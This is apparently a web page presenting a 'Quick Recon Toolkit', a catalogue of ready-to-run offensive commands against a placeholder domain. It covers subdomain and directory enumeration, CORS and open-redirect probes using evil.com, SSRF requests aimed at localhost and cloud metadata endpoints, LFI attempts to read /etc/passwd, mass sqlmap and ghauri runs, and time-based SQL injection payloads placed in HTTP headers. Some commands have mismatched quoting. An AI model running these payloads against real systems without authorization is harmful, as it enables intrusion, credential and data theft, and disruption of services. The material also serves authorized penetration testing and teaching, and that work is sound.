Quick Recon Toolkit
All-in-one recon command generator — enter a domain, get every command you need.
Subdomain Enumeration (14 commands)

Automated Enumeration

Subfinder
subfinder -d example.com -all -recursive -o subfinder.txt
Fast subdomain discovery using multiple data sources

Assetfinder
assetfinder --subs-only example.com > assetfinder.txt
Find domains and subdomains related to a given domain

Findomain
findomain -t example.com | tee findomain.txt
Cross-platform subdomain enumerator

Amass Passive
amass enum -passive -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txt
Passive subdomain enumeration using OSINT

Amass Active
amass enum -active -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txt
Active subdomain enumeration with DNS resolution

Public Sources

Certificate Transparency
curl -s "https://crt.sh/?q=example.com&output=json" | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$' > crtsh.txt
Extract subdomains from Certificate Transparency logs (the URL must be quoted, otherwise the shell treats the & as a background operator)

Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey" | sort | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sort -u > wayback.txt
Discover subdomains from archived pages

VirusTotal
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=[api-key]&domain=example.com" | jq -r '.domain_siblings[]' > virustotal.txt
Get domain siblings from VirusTotal

GitHub Subdomains
github-subdomains -d example.com -t [github_token]
Find subdomains in GitHub repositories

Subdomain Processing

Merge & Deduplicate
cat *.txt | sort -u > final.txt
Combine all subdomain files and remove duplicates

Subdomain Permutation
subfinder -d example.com | alterx | dnsx
Generate subdomain permutations and resolve them

Alterx Enrichment
echo example.com | alterx -enrich | dnsx
Enrich the domain with common naming patterns

Alterx with Wordlist
echo example.com | alterx -pp word=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | dnsx
Use a wordlist for subdomain permutation

FFUF Subdomain Bruteforce
ffuf -u "https://FUZZ.example.com" -w wordlist.txt -mc 200,301,302
Brute force subdomains using FFUF

ASN & IP Discovery (8 commands)

ASN Mapping

ASN Discovery
asnmap -d example.com | dnsx -silent -resp-only
Discover IP addresses associated with the domain's ASN

Amass Intel by Organization
amass intel -org "organization_name"
Discover assets by organization name

Amass Intel by CIDR
amass intel -active -cidr 159.69.129.82/32
Discover assets within an IP range

Amass Intel by ASN
amass intel -active -asn [asnno]
Discover assets by ASN number

IP Harvesting

VirusTotal IP Lookup
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?domain=example.com&apikey=[api-key]" | jq -r '.. | .ip_address? // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'
Extract IP addresses from VirusTotal

AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/hostname/example.com/url_list?limit=500&page=1" | jq -r '.url_list[]?.result?.urlworker?.ip // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'
Get IP addresses from AlienVault OTX

URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:example.com&size=10000" | jq -r '.results[]?.page?.ip // empty' | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}'
Extract IP addresses from URLScan.io

Shodan SSL Search
shodan search Ssl.cert.subject.CN:"example.com" 200 --fields ip_str | httpx-toolkit -sc -title -server -td
Find IP addresses using Shodan SSL certificate search

Live Host Discovery (5 commands)

HTTP Probing

HTTPX Basic
cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt
Probe for live hosts on multiple ports

HTTPX with Status Codes
cat subdomain.txt | httpx-toolkit -sc -title -server -td -ports 80,443,8080,8000,8888 -threads 200
Probe with detailed information extraction (status code, title, server header, technology detection)

Visual Recon

Aquatone Basic
cat hosts.txt | aquatone
Take screenshots of live hosts

Aquatone Custom Ports
cat hosts.txt | aquatone -ports 80,443,8000,8080,8443
Screenshot with a custom port list

Aquatone Extended Ports
cat hosts.txt | aquatone -ports 80,81,443,591,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,8443,8834,8888
Screenshot with an extended port range

URL Collection & Analysis (8 commands)

Active Crawling

Katana
katana -u livesubdomains.txt -d 2 -o urls.txt
Fast web crawler for URL discovery

Hakrawler
cat urls.txt | hakrawler -u > urls3.txt
Simple, fast web crawler

Passive Crawling

GAU (Get All URLs)
cat livesubdomains.txt | gau | sort -u > urls2.txt
Fetch known URLs from multiple sources

URLFinder
urlfinder -d example.com | sort -u > urls3.txt
Find URLs from various sources

GAU with Status Filter
echo example.com | gau --mc 200 | urldedupe > urls.txt
Get URLs with a 200 status code and deduplicate

Parameter Extraction

Extract URLs with Parameters
cat allurls.txt | grep '=' | urldedupe | tee output.txt
Extract URLs containing parameters

Parameter Pattern Matching
cat allurls.txt | grep -E '\?[^=]+=.+$' | tee output.txt
Extract URLs matching a query-string parameter pattern

GF SQLi Pattern
cat allurls.txt | gf sqli
Filter URLs potentially vulnerable to SQL injection

Vulnerability Scanning (3 commands)

Nuclei Templates

Nuclei Single Target
nuclei -u https://example.com -bs 50 -c 30
Run Nuclei templates against a single target

Nuclei Multiple Targets
nuclei -l live_domains.txt -bs 50 -c 30
Run Nuclei templates against multiple targets

Nuclei with Specific Severity
nuclei -l live_domains.txt -s critical,high -bs 50 -c 30
Run only critical and high severity templates

Sensitive File Discovery (3 commands)

File Extension Filtering

Basic Sensitive Files
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
Filter URLs for common sensitive file extensions

Extended Sensitive Files
cat allurls.txt | grep -E "\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)$"
Extended regex for sensitive file discovery (anchored to the end of the URL)

Google Dork for Files
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
Google search for sensitive files

Hidden Parameter Discovery (2 commands)

Arjun Parameter Discovery

Arjun Passive Discovery
arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
Passive parameter discovery using Arjun

Arjun Active Discovery
arjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"
Active parameter discovery with a wordlist

Directory & File Bruteforcing (3 commands)

Dirsearch

Dirsearch Basic
dirsearch -u https://example.com --full-url --deep-recursive -r
Basic directory and file discovery

Dirsearch Extended
dirsearch -u https://example.com -e php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1
Extended directory bruteforcing with multiple extensions

FFUF

FFUF Directory Discovery
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -t 10
FFUF directory discovery with recursion and multiple extensions

WordPress Security Testing (1 command)

WPScan

WPScan Full Enumeration
wpscan --url https://example.com --disable-tls-checks --api-token YOUR_API_TOKEN -e at,ap,u --plugins-detection aggressive --force
Comprehensive WordPress security scan with aggressive plugin detection (enumerates all themes, all plugins and users in a single -e list; repeating -e only keeps the last value)

CORS Testing (5 commands)

Manual CORS Testing

CORS Test with Curl
curl -H "Origin: http://evil.com" -I https://example.com/wp-json/
Test the CORS configuration with a custom origin

Detailed CORS Analysis
curl -H "Origin: http://evil.com" -I https://example.com/wp-json/ | grep -i -e "access-control-allow-origin" -e "access-control-allow-methods" -e "access-control-allow-credentials"
Analyze the CORS headers in the response

Automated CORS Testing

Nuclei CORS Test
cat subdomains.txt | httpx-toolkit -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt
Automated CORS vulnerability scanning with Nuclei

Corsy Tool
python3 corsy.py -i subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked"
Advanced CORS testing with Corsy

CORScanner
python3 CORScanner.py -u https://example.com -d -t 10
Comprehensive CORS vulnerability scanner

Subdomain Takeover (1 command)

Subzy

Subdomain Takeover Detection
subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl
Automated subdomain takeover detection with SSL verification

Git Repository Disclosure (1 command)

Git Exposure Detection

Git Directory Discovery
cat domains.txt | grep "SUCCESS" | gf urls | httpx-toolkit -sc -server -cl -path "/.git/" -mc 200 -location -ms "Index of" -probe
Detect exposed .git directories and directory listings

SSRF Testing (5 commands)

SSRF Parameter Discovery

Find SSRF Parameters
cat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -u
Identify URLs with SSRF-prone parameters

Find API/Webhook Patterns
cat urls.txt | grep -i 'webhook\|callback\|upload\|fetch\|import\|api' | sort -u
Find API endpoints and webhook integrations

SSRF Testing

Nuclei SSRF Scan
cat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/
Automated SSRF vulnerability scanning

Basic SSRF Test
curl "https://example.com/page?url=http://127.0.0.1:80/"
Basic SSRF test to localhost

Cloud Metadata SSRF
curl "https://example.com/api?endpoint=http://169.254.169.254/latest/meta-data/"
Test SSRF against cloud metadata services

Open Redirect Testing (4 commands)

Parameter Discovery

Find Redirect Parameters
cat urls.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=" | tee redirect_params.txt
Extract URLs with redirect parameters

GF Redirect Pattern
cat urls.txt | gf redirect | uro | sort -u | tee redirect_params.txt
Use GF patterns to find redirect parameters

Testing

Basic Open Redirect Test
cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
Test redirect parameters with evil.com

Comprehensive Redirect Test
subfinder -d example.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"
Full pipeline for open redirect testing

LFI Testing (3 commands)

LFI Discovery

Basic LFI Test
echo "https://example.com/" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v
LFI testing with FFUF and passwd file detection

LFI with Curl
gau example.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
LFI testing with curl and parallel processing

HTTPx LFI Test
echo 'https://example.com/index.php?page=' | httpx-toolkit -paths payloads/lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
LFI testing with httpx-toolkit

Additional Tools (7 commands)

Content Type Filtering

HTML Content Filtering
echo example.com | gau | grep -Eo '(\/[^\/]+)\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx-toolkit -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml\+xml'
Filter HTML content from discovered URLs

JavaScript Content Filtering
echo example.com | gau | grep '\.js$' | httpx-toolkit -status-code -mc 200 -content-type | grep 'application/javascript'
Filter JavaScript files from discovered URLs

Miscellaneous

Extract IP Addresses
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" file.txt
Extract IP addresses from text files

Filter Dynamic Files
cat urls.txt | grep -E '\.php|\.asp|\.aspx|\.jspx|\.jsp' | grep '=' | sort > output.txt
Filter URLs for dynamic files with parameters

Clean Parameters
cat output.txt | sed 's/=.*/=/' > final.txt
Strip parameter values so the URLs are ready for fuzzing

URO Deduplication
cat urls.txt | uro | sort -u > deduplicated_urls.txt
Remove duplicate URLs using URO

QSReplace Parameter Testing
cat urls.txt | qsreplace "FUZZ" | sort -u > fuzz_urls.txt
Replace parameter values with FUZZ for testing

SQL Injection Methodology (22 commands)

Endpoint Discovery

Single Domain SQLi Scan
subfinder -d example.com -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Single domain reconnaissance for potential SQL injectable endpoints

Multi-Subdomain SQLi Scan
subfinder -dL subdomains.txt -all -silent | httpx-toolkit -td -sc -silent | grep -Ei 'asp|php|jsp|jspx|aspx'
Multiple subdomain reconnaissance for SQL injection testing (subfinder reads a list of domains with -dL, not -d -l)

GAU Parameter Discovery
echo https://example.com | gau | uro | grep -E '\.php|\.asp|\.aspx|\.jspx|\.jsp' | grep '='
Discover potential SQL injectable parameters using gau

Katana SQLi Discovery
echo https://example.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | uro | grep -E '\.php|\.asp|\.aspx|\.jspx|\.jsp'
Alternative method for finding SQL injectable endpoints using katana

Mass Ghauri Testing
subfinder -d example.com -all -silent | gau --threads 50 | uro | gf sqli > sql.txt; ghauri -m sql.txt --batch --dbs --level 3 --confirm
Mass SQL injection testing using ghauri

Mass SQLMap Testing
subfinder -d example.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent
Comprehensive SQL injection testing using sqlmap

Header-Based Injection

User-Agent XOR Payload
curl -s -H 'User-Agent: 'XOR(if(now()=sysdate(),sleep(5),0))XOR' --url 'https://example.com'
Testing for time-based SQL injection via the User-Agent header

X-Forwarded-For XOR Payload
curl -s -H 'X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z' --url 'https://example.com'
Testing for time-based SQL injection via the X-Forwarded-For header

Referer Sleep Payload
curl -s -H 'Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'' --url 'https://example.com'
Testing for time-based SQL injection via the Referer header

User-Agent Select Sleep
curl -v -A 'Mozilla/5.0', (select*from(select(sleep(20)))a) # 'http://example.com'
Alternative User-Agent based SQL injection test

User-Agent MySQL Time-Based
curl -H 'User-Agent: XOR(if(now()=sysdate(),sleep(5),0))XOR' -X GET 'https://example.com'
User-Agent header-based MySQL time-based injection

XFF MySQL Time-Based
curl -H 'X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z' -X GET 'https://example.com'
X-Forwarded-For header-based MySQL time-based injection

Referer MySQL Time-Based
curl -H 'Referer: https://example.com/'+(select*from(select(if(1=1,sleep(20),false)))a)+'' -X GET 'https://example.com'
Referer header-based MySQL time-based injection

Database-Specific Payloads

Oracle Time-Based
SELECT dbms_pipe.receive_message(('a'),10) FROM dual
Oracle database time-based injection payload

MSSQL WAITFOR DELAY
WAITFOR DELAY '0:0:10'
Microsoft SQL Server time-based injection payload

PostgreSQL pg_sleep
SELECT pg_sleep(10)
PostgreSQL time-based injection payload

MySQL sleep
SELECT sleep(10)
MySQL time-based injection payload

Advanced Payloads

MySQL URL Encoded XOR
0'XOR(if(now()=sysdate()%2Csleep(10)%2C0))XOR'Z
MySQL alternative time-based payload with URL encoding

PostgreSQL Complex Time-Based
'OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < '0:0:1') THEN (SELECT '1'||PG_SLEEP(10)) ELSE '0' END)='1
PostgreSQL complex time-based injection payload

MySQL Multi-Condition Comment
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR''XOR(if(now()=sysdate(),sleep(10),0))OR'*/
MySQL multi-condition time-based payload with comment bypass

Combined MySQL+MSSQL
1234 AND SLEEP(10)';WAITFOR DELAY '00:00:05';--
Combined MySQL and MSSQL time-based payload

IF SLEEP Payload
paramname=1'-IF(1=1,SLEEP(10),0) AND paramname='1
Parameter-based MySQL time injection test